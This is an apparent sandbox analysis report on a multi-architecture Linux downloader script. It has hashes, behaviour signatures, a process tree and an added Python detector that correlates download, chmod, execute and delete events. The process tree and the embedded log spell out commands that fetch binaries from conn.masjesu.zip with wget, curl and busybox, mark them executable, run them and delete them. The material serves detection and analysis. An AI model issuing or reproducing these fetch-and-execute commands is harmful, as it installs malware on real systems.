Analysis
- max time kernel: 150s
- max time network: 45s
- platform: debian-9_mipsel
- resource: debian9-mipsel-20240611-en
- resource tags: arch:mipsel, image:debian9-mipsel-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
- submitted: 10-11-2024 01:01
Static task: static1
Behavioral task behavioral1
- Sample: 208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh
- Resource: ubuntu1804-amd64-20240611-en
Behavioral task behavioral2
- Sample: 208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh
- Resource: debian9-armhf-20240418-en
Behavioral task behavioral3
- Sample: 208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh
- Resource: debian9-mipsbe-20240611-en
Behavioral task behavioral4
- Sample: 208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh
- Resource: debian9-mipsel-20240611-en
General
- Target: 208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh
- Size: 10KB
- MD5: 2408085a258a318bc587e649a5e777ad
- SHA1: 7d4f24886ae9a4e5b0a1ee3866a311e53a29506d
- SHA256: 208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537
- SHA512: 5f9ddc2e0b28f44731c0d27db88455b7154293933a0aaf1d0096344f618fe40fbd5ff45ef4a56ba2a17d8e77f6de838690f88856fdbaaea0ff16dd63183bb7fa
- SSDEEP: 192:Iw+LtUc+r7f932KtEsj+nmtUc+r7f62KtEsU8:Iw+eHp+nJ18
Malware Config
Signatures
-
- File and Directory Permissions Modification (1 TTP, 11 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
Processes: chmod, PIDs 743, 750, 765, 804, 816, 827, 864, 871, 878, 885, 892 (one `chmod 777 <name>` per downloaded file; see the process tree below).
- Executes dropped EXE (11 IoCs)
Processes (path, PID):
  - /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO: 744
  - /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J: 751
  - /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv: 766
  - /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3: 805
  - /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt: 817
  - /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV: 829
  - /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B: 865
  - /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc: 872
  - /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR: 879
  - /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5: 886
  - /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y: 893
- Reads runtime system information (12 IoCs)
Processes: curl (12 invocations), each opening /proc/sys/crypto/fips_enabled for reading. This is the crypto library behind curl probing for kernel FIPS mode at startup; it fires for every curl invocation in the tree and carries no signal on its own.
- System Network Configuration Discovery (1 TTP, 35 IoCs)
Adversaries may gather information about the network configuration of a system.
Processes:
  - busybox (11): PIDs 742, 749, 758, 795, 815, 823, 863, 870, 877, 884, 891
  - curl (12): PIDs 734, 747, 754, 781, 813, 821, 853, 868, 875, 882, 889, 896
  - wget (12): PIDs 721, 746, 753, 771, 811, 820, 833, 867, 874, 881, 888, 895
This signature is attached to every wget, curl and busybox wget invocation in the tree and to nothing else; the script contains no separate reconnaissance step, so the tag reflects the downloader tools reading network configuration rather than deliberate discovery by the sample.
- Writes file to tmp directory (11 IoCs)
Malware often drops required files in the /tmp directory.
Processes: curl, "File opened for modification" on each of the following:
  - /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO
  - /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J
  - /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv
  - /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3
  - /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt
  - /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV
  - /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B
  - /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc
  - /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR
  - /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5
  - /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y
Processes
- PID 711 (level 1): /tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh
- PID 716 (level 2): /bin/rm, command `/bin/rm bins.sh`
- All remaining children are level 2 under PID 711 and follow one fixed sequence per payload name: fetch the same URL three ways (`wget <url>`, `curl -O <url>`, `/bin/busybox wget <url>`), then `chmod 777 <name>`, `./<name>`, `rm <name>`. The relative paths in chmod, exec and rm resolve against the script's working directory, /tmp. Signatures per step are identical in every iteration:
  - wget and /bin/busybox wget: System Network Configuration Discovery
  - curl -O: Reads runtime system information, System Network Configuration Discovery, Writes file to tmp directory
  - chmod 777: File and Directory Permissions Modification
  - ./<name>: Executes dropped EXE
  - rm <name>: no signature
- URL http://conn.masjesu.zip/bins/<name>; PIDs listed as wget / curl / busybox wget / chmod / exec / rm:
  - d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO: 721 / 734 / 742 / 743 / 744 / 745
  - b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J: 746 / 747 / 749 / 750 / 751 / 752
  - V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv: 753 / 754 / 758 / 765 / 766 / 769
  - trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3: 771 / 781 / 795 / 804 / 805 / 809
  - qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt: 811 / 813 / 815 / 816 / 817 / 819
  - 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV: 820 / 821 / 823 / 827 / 829 / 831
  - z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B: 833 / 853 / 863 / 864 / 865 / 866
  - qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc: 867 / 868 / 870 / 871 / 872 / 873
  - 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR: 874 / 875 / 877 / 878 / 879 / 880
  - pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5: 881 / 882 / 884 / 885 / 886 / 887
  - wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y: 888 / 889 / 891 / 892 / 893 / 894
  - mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF: 895 / 896 only. This curl carries Reads runtime system information and System Network Configuration Discovery but no Writes file to tmp directory tag, and no busybox wget, chmod, exec or rm for this name was recorded; the trace ends here.
Reading the tree: the twelve file names carry no architecture hint, so the script cannot pick the right binary for the host and instead runs every one in turn, which is the usual shape of a multi-architecture downloader; deleting bins.sh first and each binary immediately after launching it keeps nothing on disk for a responder to collect. "Executes dropped EXE" records only that a process was started from /tmp, not that the binary ran successfully on this mipsel guest. Only two download artifacts were captured (153 B and 176 B, listed under Downloads), so whether conn.masjesu.zip was serving the intended payloads at analysis time cannot be determined from this report; the behaviour recorded here is that of the downloader script alone.
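The sequence above (fetch to /tmp, chmod, execute, delete) is what a detection should key on rather than any single command. As an added example that is not part of the sandbox report, the Python below replays process-creation events transcribed from the tree (first two iterations plus the truncated twelfth) and correlates them by artifact basename into download, chmod, exec and delete stages, flags the chains that reached execution, and pulls the URLs, host and dropped file names out as IoCs. The pipe-separated log format, the function names, the set of downloader tools and the staging directories are assumptions of this example; the PIDs, paths and command lines come from the report.

```python
import re
from urllib.parse import urlsplit

# Constructed input for this example: process-creation events as pid|image|command line,
# transcribed from the sandbox process tree above for the first two fetch iterations and
# the truncated twelfth one; the other nine iterations have exactly the same shape.
PROCESS_LOG = """\
711|/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh|/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh
716|/bin/rm|/bin/rm bins.sh
721|/usr/bin/wget|wget http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO
734|/usr/bin/curl|curl -O http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO
742|/bin/busybox|/bin/busybox wget http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO
743|/bin/chmod|chmod 777 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO
744|/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO|./d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO
745|/bin/rm|rm d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO
746|/usr/bin/wget|wget http://conn.masjesu.zip/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J
747|/usr/bin/curl|curl -O http://conn.masjesu.zip/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J
749|/bin/busybox|/bin/busybox wget http://conn.masjesu.zip/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J
750|/bin/chmod|chmod 777 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J
751|/tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J|./b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J
752|/bin/rm|rm b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J
895|/usr/bin/wget|wget http://conn.masjesu.zip/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF
896|/usr/bin/curl|curl -O http://conn.masjesu.zip/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF
"""

URL_RE = re.compile(r"https?://\S+")
DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}    # assumed set of fetch tools to watch
STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")   # assumed world-writable staging paths
REQUIRED = ("download", "chmod", "exec")            # delete is optional for a hit


def parse_log(text):
    """Parse the pipe-separated event format assumed by this example."""
    events = []
    for line in text.splitlines():
        if line.strip():
            pid, image, cmdline = line.split("|", 2)
            events.append((int(pid), image, cmdline))
    return events


def _adds_exec(mode):
    """True for numeric modes with any x bit (777, 0755) or symbolic modes adding x (+x, u+x)."""
    if mode and set(mode) <= set("01234567"):
        return bool(int(mode[-3:], 8) & 0o111)
    return "+" in mode and "x" in mode


def classify(image, cmdline):
    """Map one process to (stage, artifact basename, url or None); None if uninteresting."""
    argv = cmdline.split()
    tool = image.rsplit("/", 1)[-1]
    if tool == "busybox" and len(argv) > 1:          # busybox applet: real tool is argv[1]
        tool, argv = argv[1], argv[1:]
    if tool in DOWNLOADERS:
        m = URL_RE.search(cmdline)
        if m:
            url = m.group(0)
            return ("download", urlsplit(url).path.rsplit("/", 1)[-1], url)
        return None
    if tool == "chmod" and len(argv) >= 3 and _adds_exec(argv[1]):
        return ("chmod", argv[-1].rsplit("/", 1)[-1], None)
    if image.startswith(STAGING_DIRS):               # anything executed out of a staging dir
        return ("exec", tool, None)
    if tool == "rm" and len(argv) >= 2:
        return ("delete", argv[-1].rsplit("/", 1)[-1], None)
    return None


def build_chains(events):
    """Group classified events by artifact name: {name: {"stages": {stage: [pids]}, "urls": set}}."""
    chains = {}
    for pid, image, cmdline in events:
        hit = classify(image, cmdline)
        if hit is None:
            continue
        stage, name, url = hit
        chain = chains.setdefault(name, {"stages": {}, "urls": set()})
        chain["stages"].setdefault(stage, []).append(pid)
        if url:
            chain["urls"].add(url)
    return chains


def complete_chains(events):
    """Artifacts that were downloaded, made executable and run, in order of first sighting."""
    return [name for name, c in build_chains(events).items()
            if all(stage in c["stages"] for stage in REQUIRED)]


def extract_iocs(events):
    """Network and host IoCs implied by the chains: fetch URLs, contacted hosts, dropped names."""
    chains = build_chains(events)
    urls = sorted(u for c in chains.values() for u in c["urls"])
    hosts = sorted({urlsplit(u).hostname for u in urls})
    dropped = sorted(n for n, c in chains.items()
                     if "download" in c["stages"] and "exec" in c["stages"])
    return {"urls": urls, "hosts": hosts, "dropped": dropped}


if __name__ == "__main__":
    evs = parse_log(PROCESS_LOG)
    chains = build_chains(evs)
    for name in complete_chains(evs):
        print(f"download->chmod->exec chain: {name} {chains[name]['stages']}")
    print(extract_iocs(evs))
```

Correlating on the artifact basename is what makes the twelfth name fall out as incomplete: it was fetched but never chmod'ed or executed in the trace, which matches the cut-off at PID 896. On a real host the same logic would run over auditd or eBPF execve events with the process tree used to confirm all stages share a parent.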
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 153B
  MD5: 998368d7c95ea4293237f2320546e440
  SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
  SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
  SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97
- Filesize: 176B
  MD5: e1732e70f015e99d14dff1eeeaec9966
  SHA1: c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
  SHA256: 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
  SHA512: 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7